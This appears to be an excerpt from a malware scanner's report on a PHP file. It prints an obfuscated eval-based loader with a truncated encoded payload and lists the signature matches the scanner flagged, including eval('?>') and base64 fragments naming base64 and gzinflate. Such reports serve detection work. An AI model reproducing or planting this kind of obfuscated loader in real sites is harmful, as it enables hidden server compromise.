eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|